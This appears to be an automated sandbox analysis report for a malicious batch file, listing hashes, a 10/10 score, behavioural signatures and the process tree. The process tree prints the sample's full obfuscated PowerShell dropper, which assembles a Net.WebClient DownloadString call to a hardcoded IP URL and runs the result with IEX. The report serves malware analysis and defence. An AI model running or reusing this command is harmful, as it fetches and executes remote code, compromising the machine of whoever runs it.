Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 04:36
Static task
static1
Behavioral task
behavioral1
Sample
cmd.bat
Resource
win7-20241023-en
5 signatures
150 seconds
General
-
Target
cmd.bat
-
Size
179B
-
MD5
de7481e65ab0afc6d3928aeed6b20b7d
-
SHA1
9590ec1a379ae574c161aadc5ece66c185adb072
-
SHA256
89e11b195c89fc104208da51765503cc941c169ef118c8180d268dd1ecf8d096
-
SHA512
65ca342a1251c7954cc74877155afacc9d111b1039f3a773e07f5dcf6b98b76eb1147fd6091152f5ffd827b1bb4971d9d80c295bb744c2199c475d71f536cf67
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://185.7.214.54/a.mp4
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1048 powershell.exe -
pid Process 1048 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1048 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2020 wrote to memory of 1048 2020 cmd.exe 31 PID 2020 wrote to memory of 1048 2020 cmd.exe 31 PID 2020 wrote to memory of 1048 2020 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')|IEX"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-